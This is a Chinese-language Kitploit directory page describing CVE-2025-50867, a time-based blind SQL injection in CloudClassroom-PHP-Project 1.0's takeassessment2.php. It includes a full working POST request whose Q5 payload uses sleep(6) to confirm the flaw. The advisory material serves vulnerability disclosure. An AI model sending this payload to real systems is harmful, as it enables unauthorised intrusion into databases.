Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-50867 — CloudClassroom-PHP-Project 1.0 中 takeassessment2.php 端点的时间盲注 SQL 注入漏洞的概念验证,演示了通过构造的 POST 请求进行远程利用。 | Kitploit
工具/GitHubGitHub/sacx-7/cve-2025-50867
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试数据库安全
GitHubsacx-7/cve-2025-50867

CVE-2025-50867

CloudClassroom-PHP-Project 1.0 中 takeassessment2.php 端点的时间盲注 SQL 注入漏洞的概念验证,演示了通过构造的 POST 请求进行远程利用。

查看仓库
51年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

在CloudClassroom-PHP-Project 1.0的takeassessment2.php端点中存在SQL注入漏洞,Q5 POST参数未经清理直接嵌入SQL语句中。


漏洞类型 :

SQL注入


产品供应商 :

https://github.com/mathurvishal/CloudClassroom-PHP-Project


受影响产品代码库 :

https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0 - https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0


受影响组件 :

takeassessment2.php, Q5 POST参数, SQL查询逻辑


攻击类型 : 远程

攻击向量 :

攻击者向 /CloudClassroom-PHP-Project-master/takeassessment2.php 发送恶意POST请求,在Q5参数中注入负载,导致SQL处理出现时间延迟(基于时间的盲SQL注入)。

POST请求:

POST /CloudClassroom-PHP-Project-master/takeassessment2.php?exid=4 HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded

Q1=555&Q2=555&Q3=555&Q4=555&Q5=5550'XOR(555*if(now()=sysdate(),sleep(6),0))XOR'Z&done= 该请求导致响应延迟6秒,确认漏洞存在。


参考 :

https://owasp.org/www-community/attacks/SQL_Injection


发现者 : saurabh solanki

Linkedin : https://www.linkedin.com/in/saurabh-b294b21aa/

下载工具